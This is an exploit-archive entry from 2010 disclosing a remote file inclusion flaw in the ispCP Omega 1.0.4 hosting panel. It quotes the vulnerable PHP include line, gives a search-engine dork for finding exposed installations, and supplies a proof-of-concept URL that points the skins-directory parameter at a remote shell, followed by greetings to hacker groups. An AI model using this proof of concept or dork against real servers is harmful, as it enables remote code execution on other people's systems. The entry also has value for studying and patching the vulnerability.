ispCP Omega 1.0.4 - Remote File Inclusion



EKU-ID: 18961 CVE: OSVDB-62852 OSVDB-ID:
Author: cr4wl3r Published: 2010-03-10 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


[+] ispCP Omega <= 1.0.4 Remote File Include Vulnerability

[+] Discovered By: cr4wl3r
[+] Download: http://isp-control.net/
[+] Dork: "Powered by ispCP Omega"
[+] Code in [ispcp-omega-1.0.4/gui/tools/filemanager/skins/mobile/admin1.template.php]

[x] <?php require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php"); ?>

[+] PoC: [path]/tools/filemanager/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=[Shell]

[+] Greetz and thanks to:
[!] str0ke [milw0rm.com]
[!] r0073r, 0x1D [inj3ct0r.com]
[!] opt!x hacker [morrocan hacker]
[!] xoron [turkish hacker]
[!] irvian, cyberlog, [sekuritionline.net]
[!] EA ngel, basix, angky_tatoki, doniskaynet, panteto [manadocoding.net]
[!] boom3rang [khg-cr3w.org]